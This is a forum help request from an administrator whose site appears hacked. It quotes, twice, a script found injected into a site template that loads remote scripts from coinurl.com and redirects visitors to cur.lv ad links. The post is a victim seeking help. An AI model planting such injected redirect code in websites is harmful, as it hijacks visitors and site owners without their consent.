2014-02-13, 01:43 PM
(This post was last modified: 2014-02-13, 01:57 PM by eddiekeyton.)
I woke up today, and all of my mods were disabled. Now everytime I click on a forum to view the posts, it redirects me to a cur.lv website that has a skip ad in the top right? Any idea? Also all of my plugins were disabled. Now when i enabled them I have a couple with duplicate settings in the configuration. Is this a hack attempt? Any idea on how to fix this?
went searching through template files and under the "redirect" category in the template editors i found this code in the template REDIRECT>HEADERINCLUDE>
<script type="text/javascript" src="http://coinurl.com/script/jquery-latest.min.js"></script>
<script type="text/javascript" src="http://coinurl.com/script/jquery.cookie.js"></script>
<script type="text/javascript" src="http://coinurl.com/script/md5.js"></script>
<script type="text/javascript">
$(function() {
var id = "17f21641826c543661aa71544404b19e";
var url = encodeURIComponent(window.location.href);
var hash = CryptoJS.MD5(url);
if($.cookie('coinurl_' + hash) == null) {
var redirect = "http://cur.lv/redirect.php?id=" + id + "&url=" + url;
$.cookie('coinurl_' + hash, true, {expires: 1});
top.location.assign(redirect);
}
});
went searching through template files and under the "redirect" category in the template editors i found this code in the template REDIRECT>HEADERINCLUDE>
<script type="text/javascript" src="http://coinurl.com/script/jquery-latest.min.js"></script>
<script type="text/javascript" src="http://coinurl.com/script/jquery.cookie.js"></script>
<script type="text/javascript" src="http://coinurl.com/script/md5.js"></script>
<script type="text/javascript">
$(function() {
var id = "17f21641826c543661aa71544404b19e";
var url = encodeURIComponent(window.location.href);
var hash = CryptoJS.MD5(url);
if($.cookie('coinurl_' + hash) == null) {
var redirect = "http://cur.lv/redirect.php?id=" + id + "&url=" + url;
$.cookie('coinurl_' + hash, true, {expires: 1});
top.location.assign(redirect);
}
});